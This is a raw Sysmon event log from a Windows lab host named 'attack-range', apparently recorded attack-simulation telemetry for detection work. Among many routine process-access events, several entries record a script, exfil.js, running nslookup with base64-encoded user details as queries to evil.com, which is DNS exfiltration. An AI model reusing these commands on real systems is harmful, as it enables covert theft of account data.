14:16:24.143{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.143{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.143{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.143{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.143{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-8F3F-000000005F02}3976C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.143{2E1864BB-17B8-629A-8D3F-000000005F02}75204864C:\Windows\system32\cmd.exe{2E1864BB-17B8-629A-8F3F-000000005F02}3976C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.154{2E1864BB-17B8-629A-8F3F-000000005F02}3976C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B8-629A-8D3F-000000005F02}7520C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljbixck.tmp 2>&1 10341000x8000000000000000198200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.127{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-8E3F-000000005F02}7312C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.127{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-8E3F-000000005F02}7312C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.112{2E1864BB-17B8-629A-8E3F-000000005F02}73122068C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-8D3F-000000005F02}7520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.096{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-8E3F-000000005F02}7312C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.096{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-8D3F-000000005F02}7520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.096{2E1864BB-17A1-629A-783D-000000005F02}55525720C:\Windows\System32\WScript.exe{2E1864BB-17B8-629A-8D3F-000000005F02}7520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.104{2E1864BB-17B8-629A-8D3F-000000005F02}7520C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljbixck.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.096{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlavqg.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.059{2E1864BB-17B8-629A-8B3F-000000005F02}78803552C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-8C3F-000000005F02}1908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.059{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.059{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.059{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.059{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.059{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-8C3F-000000005F02}1908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.059{2E1864BB-17B8-629A-8A3F-000000005F02}73287616C:\Windows\system32\cmd.exe{2E1864BB-17B8-629A-8C3F-000000005F02}1908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.067{2E1864BB-17B8-629A-8C3F-000000005F02}1908C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B8-629A-8A3F-000000005F02}7328C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlavqg.tmp 2>&1 10341000x8000000000000000198180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.043{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-8B3F-000000005F02}7880C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.043{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-8B3F-000000005F02}7880C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.043{2E1864BB-17B8-629A-8B3F-000000005F02}78803552C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-8A3F-000000005F02}7328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.027{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-8B3F-000000005F02}7880C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 